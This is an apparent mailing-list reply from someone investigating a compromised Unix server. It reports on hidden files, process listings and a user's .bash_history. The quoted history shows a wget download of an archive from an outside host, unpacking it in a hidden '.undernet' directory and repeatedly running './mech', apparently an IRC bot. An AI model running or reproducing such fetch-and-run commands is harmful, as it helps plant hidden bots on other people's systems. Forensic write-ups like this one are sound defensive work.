>Were there any interesting files in the users' home directories? (Look for >hidden files too, of course -- maybe a hidden directory named ... or >something.) Also check in /tmp and /var. And any luck with the >.bash_history? (For both the users and for root....) This is ~daikanyama/.bash_history passwd ls w wget www.ring.as.ro/x/qwe.tgz tar zxvf qwe.tgz rm -rf qwe.tgz cd .undernet ./mech ./mech ./mech ./mech There is a complex directory tree under ~daikanyama/.undernet There are no interesting files under ~kevin. Kevin had tcsh as login shell. Using ps aux, I have seen that kevin used ftp, and kevin also used passwd. One of the users compiled something, I have seen that they utilized "make". Kevin installed some program psybnc under /var/tmp There is nothing interesting in /tmp and /root (root has tcsh as login shell). -- +++ Sparen beginnt mit GMX DSL: http://www.gmx.net/de/go/dsl
